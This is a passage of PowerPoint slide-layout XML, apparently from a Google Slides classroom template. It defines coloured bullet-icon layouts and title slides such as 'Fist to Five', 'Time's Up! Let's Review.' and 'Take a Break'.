          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="886" name="Google Shape;886;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="887" name="Google Shape;887;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="888" name="Google Shape;888;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="889" name="Google Shape;889;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="890" name="Google Shape;890;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>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44. Bullets 1–8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 891"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;p4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93" name="Google Shape;893;p4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94" name="Google Shape;894;p4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895" name="Google Shape;895;p4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896" name="Google Shape;896;p4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97" name="Google Shape;897;p4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98" name="Google Shape;898;p45"/>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45"/>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0" name="Google Shape;900;p45"/>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45"/>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2" name="Google Shape;902;p45"/>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45"/>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4" name="Google Shape;904;p45"/>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45"/>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6" name="Google Shape;906;p45"/>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45"/>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8" name="Google Shape;908;p45"/>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45"/>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0" name="Google Shape;910;p45"/>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45"/>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2" name="Google Shape;912;p45"/>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45"/>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14" name="Google Shape;914;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="915" name="Google Shape;915;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="916" name="Google Shape;916;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="917" name="Google Shape;917;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="918" name="Google Shape;918;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="919" name="Google Shape;919;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="920" name="Google Shape;920;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="921" name="Google Shape;921;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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45. Bullets 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 922"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923;p4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24" name="Google Shape;924;p4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925" name="Google Shape;925;p4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926" name="Google Shape;926;p4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927" name="Google Shape;927;p4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928" name="Google Shape;928;p4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29" name="Google Shape;929;p46"/>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46"/>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1" name="Google Shape;931;p46"/>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46"/>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3" name="Google Shape;933;p46"/>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46"/>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5" name="Google Shape;935;p46"/>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46"/>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7" name="Google Shape;937;p46"/>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46"/>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9" name="Google Shape;939;p46"/>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46"/>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1" name="Google Shape;941;p46"/>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46"/>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3" name="Google Shape;943;p46"/>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46"/>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45" name="Google Shape;945;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="946" name="Google Shape;946;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="947" name="Google Shape;947;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="948" name="Google Shape;948;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="949" name="Google Shape;949;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="950" name="Google Shape;950;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="951" name="Google Shape;951;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="952" name="Google Shape;952;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>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46. Bullets 1–8 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 953"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;p4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55" name="Google Shape;955;p4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956" name="Google Shape;956;p4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957" name="Google Shape;957;p4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958" name="Google Shape;958;p4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959" name="Google Shape;959;p4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0" name="Google Shape;960;p47"/>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47"/>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2" name="Google Shape;962;p47"/>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47"/>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4" name="Google Shape;964;p47"/>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47"/>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6" name="Google Shape;966;p47"/>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47"/>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8" name="Google Shape;968;p47"/>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47"/>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0" name="Google Shape;970;p47"/>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47"/>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2" name="Google Shape;972;p47"/>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47"/>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4" name="Google Shape;974;p47"/>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47"/>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76" name="Google Shape;976;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="977" name="Google Shape;977;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="978" name="Google Shape;978;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="979" name="Google Shape;979;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="980" name="Google Shape;980;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="981" name="Google Shape;981;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="982" name="Google Shape;982;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="983" name="Google Shape;983;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>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47. Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 984"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="985" name="Google Shape;985;p48"/>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986" name="Google Shape;986;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="3307075"/>
            <a:ext cx="8595300" cy="15615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000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto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87" name="Google Shape;987;p4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988" name="Google Shape;988;p48"/>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89" name="Google Shape;989;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="827549" y="769725"/>
            <a:ext cx="7488902" cy="1856625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="990" name="Google Shape;990;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202525" y="2754341"/>
            <a:ext cx="8595300" cy="371100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="0" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>FIST TO FIVE:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="991" name="Google Shape;991;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="3307075"/>
            <a:ext cx="45330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48. Review">
  <p:cSld name="CUSTOM_17_2_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 992"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="993" name="Google Shape;993;p49"/>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994" name="Google Shape;994;p4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995" name="Google Shape;995;p49"/>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96" name="Google Shape;996;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="2880775"/>
            <a:ext cx="85953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a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time’s Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="997" name="Google Shape;997;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960959" y="1143000"/>
            <a:ext cx="1222082" cy="1638675"/>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49. Take a Break 1">
  <p:cSld name="CUSTOM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 998"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="999" name="Google Shape;999;p5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1000" name="Google Shape;1000;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-42900" y="-24125"/>
            <a:ext cx="9229800" cy="5191749"/>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5. Subsection Slide">
  <p:cSld name="CUSTOM_17_2_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
